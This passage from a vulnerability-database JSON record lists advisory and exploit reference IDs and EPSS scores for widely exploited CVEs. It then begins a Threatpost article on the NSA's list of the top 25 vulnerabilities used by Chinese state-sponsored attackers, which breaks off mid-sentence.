"CPAI-2019-0073", "CPAI-2019-0076", "CPAI-2019-0430", "CPAI-2019-0506", "CPAI-2019-0657", "CPAI-2019-0860", "CPAI-2019-1097", "CPAI-2019-1572", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2019-2527", "CPAI-2020-0019", "CPAI-2020-0104", "CPAI-2020-0118", "CPAI-2020-0179", "CPAI-2020-0320", "CPAI-2020-0628", "CPAI-2020-0658", "CPAI-2020-0712", "CPAI-2020-0872", "CPAI-2020-1065", "CPAI-2020-1095"]}, {"type": "checkpoint_security", "idList": ["CPS:SK164716"]}, {"type": "chrome", "idList": ["GCSA-7741258004223335178"]}, {"type": "cisa", "idList": ["CISA:0A6DEB06CFB7BDA5A3D72E0F236C5665", "CISA:134C272F26FB005321448C648224EB02", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:2B970469D89016F563E142BE209443D8", 
"CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:72803FA1C7CD81E274A0417B0A34353E", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:871444F0026579280090F0A0759442B1", "CISA:8809AF4B96861275A43448FB64E686D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:CB56EF9CA511DD125626482598E6359A", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0158", "CISA-KEV-CVE-2015-4852", "CISA-KEV-CVE-2017-6327", "CISA-KEV-CVE-2018-4939", "CISA-KEV-CVE-2018-6789", "CISA-KEV-CVE-2019-0708", "CISA-KEV-CVE-2019-0803", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-11580", "CISA-KEV-CVE-2019-1652", "CISA-KEV-CVE-2019-1653", "CISA-KEV-CVE-2019-16920", "CISA-KEV-CVE-2019-18935", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2019-3396", "CISA-KEV-CVE-2020-0601", "CISA-KEV-CVE-2020-0688", "CISA-KEV-CVE-2020-10189", "CISA-KEV-CVE-2020-1040", "CISA-KEV-CVE-2020-1350", "CISA-KEV-CVE-2020-1472", "CISA-KEV-CVE-2020-15505", "CISA-KEV-CVE-2020-2555", "CISA-KEV-CVE-2020-3118", "CISA-KEV-CVE-2020-5902", "CISA-KEV-CVE-2020-8193", "CISA-KEV-CVE-2020-8195", "CISA-KEV-CVE-2020-8196", "CISA-KEV-CVE-2020-8515", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-20190123-RV-INFO", "CISCO-SA-20190123-RV-INJECT", "CISCO-SA-20200205-IOSXR-CDP-RCE"]}, {"type": "citrix", "idList": ["CTX267027", "CTX276688"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:7DA761A6C6FF78EAAABBA6C79E29B2BE"]}, {"type": "cnvd", "idList": ["CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", 
"CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0685", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-0859", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1032", "CVE-2020-1036", "CVE-2020-1040", "CVE-2020-1041", "CVE-2020-1042", "CVE-2020-1043", "CVE-2020-1350", "CVE-2020-13896", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1274-1:2DD70", "DEBIAN:DLA-1274-1:F1418", "DEBIAN:DLA-2463-1:1381E", "DEBIAN:DSA-4110-1:E5F9E", "DEBIAN:DSA-4110-1:E8B3F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-6789", "DEBIANCVE:CVE-2020-1472"]}, {"type": "dsquare", "idList": ["E-581", "E-686", "E-688", "E-700", "E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:42519", "EDB-ID:42613", "EDB-ID:42806", "EDB-ID:44571", "EDB-ID:45671", "EDB-ID:46243", "EDB-ID:46262", "EDB-ID:46655", "EDB-ID:46731", "EDB-ID:46904", "EDB-ID:46920", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:47573", "EDB-ID:47793", "EDB-ID:47837", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48153", "EDB-ID:48168", "EDB-ID:48268", "EDB-ID:48320", "EDB-ID:48508", "EDB-ID:48642", "EDB-ID:48711", "EDB-ID:49038", "EDB-ID:49071", "EDB-ID:49465"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0242F3AC3E43042D33450FE96E439DA3", "EXPLOITPACK:028DB84C4840B8D96405811A4FA47345", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:0519749D0277AA37252F33DA68C2BB93", "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "EXPLOITPACK:151CC13EACB74ED26DB94EB794D08ABD", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:2EB81502D633A85397D825E99A410AAC", 
"EXPLOITPACK:4639A09DD9AC0CEB700BE689515D2AE7", "EXPLOITPACK:6EC3063003DFEB019CB57306B1F575D0", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC", "EXPLOITPACK:CBE77C73EECE77F0D21EA2908C0F68CF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:D1236C309752040951CA6CF70D1EEE69"]}, {"type": "f5", "idList": ["F5:K25238311", "F5:K30518307", "F5:K93951507", "SOL30518307"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:3B593605DCC5", "FEDORA:4A64830CFCDC", "FEDORA:C80A96015189", "FEDORA:D8A0E3053060"]}, {"type": "filippoio", "idList": ["FILIPPOIO:A761D20DF072FAFAF24F6BC3A68D6AF9"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:38120E3D3979DCD57297419690545DDD", "FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623", "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE"]}, {"type": "fortinet", "idList": ["FG-IR-22-398"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "316B3C3E-0E98-11E8-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201803-01", "GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", 
"042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A03C474-5159-5D12-82D2-E28FA42B84BB", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0AF42B8A-DF0D-58F8-AB60-9E7C63ED9EEB", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0DE05C29-C117-5BDD-BD53-50EBCC8ED0EB", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "10F73C81-91F0-5199-9C8E-432BF228C96A", "12E44744-1AF0-523A-ACA2-593B4D33E014", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "1741E720-F85A-5179-AB8A-D6FA2E185092", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "20466D13-6C5B-5326-9C8B-160E9BE37195", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2255B39F-1B91-56F4-A323-8704808620D3", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27ACD5A9-5233-5B12-9EAA-2894279320B8", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2A7F5F31-A737-556D-A869-05B87FD1F625", 
"2A80D982-2C57-5BA2-86CB-6169F3859086", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D3AD059-4772-527B-A78C-724AFA1B109F", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "31DB22CD-3492-524F-9D26-035FC1086A71", "328E8BFC-210D-5993-885E-7710FEE734CC", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "370515CC-C819-5D01-917D-2DF4728A28F4", "37D3D343-97C5-5C12-8595-042E337E31C0", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3AFE745D-D706-5B84-B2C7-205590936BBF", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "3F400483-1F7E-5BE5-8612-4D55D450D553", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "479FD3C0-1269-5BC3-BD67-CDEE0485485A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "49EC151F-12F0-59CF-960C-25BD54F46680", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E477E4A-4794-5B4A-8706-915B06422C95", "4FB516B4-0874-5E17-9C4F-8A7BB4481529", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "52031500-2782-51DA-B154-586E4A0857F6", "523F993F-2487-5C75-A910-22605D6D57D9", 
"52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "560405C4-4806-5173-B662-F9C3D776D8D4", "58F1E19B-12E9-5FE1-90C6-14688FEE3C8C", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "5F6BE6F7-C220-5BDD-BE92-A5156F21A1B2", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "637FA72A-45F0-5611-85EB-A28965CFDB93", "63C36F7A-5F99-5A79-B99F-260360AC237F", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "757B9105-ADEF-5B27-8B1F-A06AE0566065", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77A82210-BA24-58B5-8539-C0177DA9E1FB", "78155987-ACB5-51CD-99EB-FF372456D94D", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "7F937E02-A1B2-5F78-B140-90BC298729D4", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "830986C7-0D62-5E59-B6E2-647821C4FF8B", "84FC95F2-00DB-57F5-A2B1-DE1C4D9C77E1", "851959DE-3B5C-5317-868E-5D80E801E3B0", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "88373793-9076-5F05-BDBB-635A7E1BD897", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "8C937DCD-4090-5A44-9361-4D9ECF545843", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "92BBBF7B-026E-553A-883B-AEF503046C18", 
"THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BBF9233468A677A95C5E9D149089804E", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:D17226438122ABE49AFDDCE85A06760D", "THREATPOST:DB438BDD32A19C608E74D09992D53881", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDC9BA5F3C0866F008FA19229719AA13", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F655BBBA2F55BA4D5A5093E56BB1E78E", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911"]}, {"type": "trellix", "idList": ["TRELLIX:1C43DDFF23D74094DC43986305E2F780", "TRELLIX:595642FD30B52118607424330C136C80", "TRELLIX:6373864BD1A0BAFE3430F237433C84A5", "TRELLIX:6A66742843755E787356176A644AAD06", "TRELLIX:B73136D0B1874E13EB839E42FB157903", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4", "TRELLIX:CC89DE5CDC16462BF1BBC90EE93DEE24", "TRELLIX:D9D2CB1A313A30DE730375258BD8DF6E"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:050D656256F03C0EED34A855C44FC7E0", "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:1D57AF69829D398639E3A4113B667998", "TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:A08558154279E1489712528387FEF700"]}, {"type": "ubuntu", "idList": ["USN-3565-1", "USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-4852", "UB:CVE-2018-6789", "UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:1847", "VERACODE:22403", "VERACODE:25767", "VERACODE:27548"]}, {"type": "zdi", "idList": ["ZDI-20-128", "ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-28326", "1337DAY-ID-28427", "1337DAY-ID-28661", "1337DAY-ID-30269", "1337DAY-ID-30290", "1337DAY-ID-31403", "1337DAY-ID-32052", "1337DAY-ID-32053", "1337DAY-ID-32070", "1337DAY-ID-32437", "1337DAY-ID-32438", "1337DAY-ID-32439", "1337DAY-ID-32455", "1337DAY-ID-32569", "1337DAY-ID-32790", "1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33140", "1337DAY-ID-33275", "1337DAY-ID-33438", "1337DAY-ID-33565", "1337DAY-ID-33683", "1337DAY-ID-33725", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33828", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34095", "1337DAY-ID-34170", "1337DAY-ID-34184", "1337DAY-ID-34235", "1337DAY-ID-34468", "1337DAY-ID-34553", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-35085", "1337DAY-ID-35228", "1337DAY-ID-35274", "1337DAY-ID-35740", "1337DAY-ID-36350", "1337DAY-ID-36351", "1337DAY-ID-38189", "1337DAY-ID-38193", "1337DAY-ID-38195"]}]}, "score": {"value": 10.6, "vector": "NONE"}, "epss": [{"cve": "CVE-2012-0158", "epss": 0.97314, "percentile": 0.99769, "modified": "2023-05-01"}, 
{"cve": "CVE-2015-4852", "epss": 0.96313, "percentile": 0.9925, "modified": "2023-05-01"}, {"cve": "CVE-2017-6327", "epss": 0.49852, "percentile": 0.96959, "modified": "2023-05-02"}, {"cve": "CVE-2017-6328", "epss": 0.00161, "percentile": 0.51307, "modified": "2023-05-02"}, {"cve": "CVE-2018-4939", "epss": 0.97251, "percentile": 0.9972, "modified": "2023-05-02"}, {"cve": "CVE-2018-6789", "epss": 0.97394, "percentile": 0.99849, "modified": "2023-05-01"}, {"cve": "CVE-2019-0708", "epss": 0.97524, "percentile": 0.99977, "modified": "2023-05-02"}, {"cve": "CVE-2019-0803", "epss": 0.00476, "percentile": 0.72126, "modified": "2023-05-02"}, {"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-11580", "epss": 0.97471, "percentile": 0.99934, "modified": "2023-05-02"}, {"cve": "CVE-2019-16278", "epss": 0.97411, "percentile": 0.99866, "modified": "2023-05-02"}, {"cve": "CVE-2019-1652", "epss": 0.97448, "percentile": 0.99905, "modified": "2023-05-02"}, {"cve": "CVE-2019-1653", "epss": 0.97569, "percentile": 0.99997, "modified": "2023-05-02"}, {"cve": "CVE-2019-16920", "epss": 0.96236, "percentile": 0.99223, "modified": "2023-05-02"}, {"cve": "CVE-2019-18935", "epss": 0.8927, "percentile": 0.98183, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}, {"cve": "CVE-2019-3396", "epss": 0.97503, "percentile": 0.9996, "modified": "2023-05-02"}, {"cve": "CVE-2020-0601", "epss": 0.97284, "percentile": 0.99748, "modified": "2023-05-02"}, {"cve": "CVE-2020-0688", "epss": 0.97379, "percentile": 0.99829, "modified": "2023-05-02"}, {"cve": "CVE-2020-10189", "epss": 0.97136, "percentile": 0.99636, "modified": "2023-05-02"}, {"cve": "CVE-2020-1040", "epss": 0.00315, "percentile": 0.65774, "modified": "2023-05-01"}, {"cve": "CVE-2020-1350", "epss": 0.92976, "percentile": 0.98517, "modified": "2023-05-01"}, {"cve": "CVE-2020-1472", "epss": 0.97362, "percentile": 0.99808, 
"modified": "2023-05-01"}, {"cve": "CVE-2020-15505", "epss": 0.97524, "percentile": 0.99977, "modified": "2023-05-01"}, {"cve": "CVE-2020-2555", "epss": 0.95786, "percentile": 0.99083, "modified": "2023-05-02"}, {"cve": "CVE-2020-3118", "epss": 0.00219, "percentile": 0.58361, "modified": "2023-05-02"}, {"cve": "CVE-2020-5902", "epss": 0.97562, "percentile": 0.99995, "modified": "2023-05-01"}, {"cve": "CVE-2020-6789", "epss": 0.00065, "percentile": 0.26588, "modified": "2023-05-01"}, {"cve": "CVE-2020-8193", "epss": 0.97456, "percentile": 0.99915, "modified": "2023-05-01"}, {"cve": "CVE-2020-8195", "epss": 0.94896, "percentile": 0.98842, "modified": "2023-05-01"}, {"cve": "CVE-2020-8196", "epss": 0.00183, "percentile": 0.54033, "modified": "2023-05-01"}, {"cve": "CVE-2020-8515", "epss": 0.97183, "percentile": 0.99668, "modified": "2023-05-02"}], "vulnersScore": 10.6}, "_state": {"dependencies": 1695454225, "score": 1695454452, "epss": 0}, "_internal": {"score_hash": "537c7afb00eac378f8b11fc67364b535"}}
{"threatpost": [{"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. 
elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). 
This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the 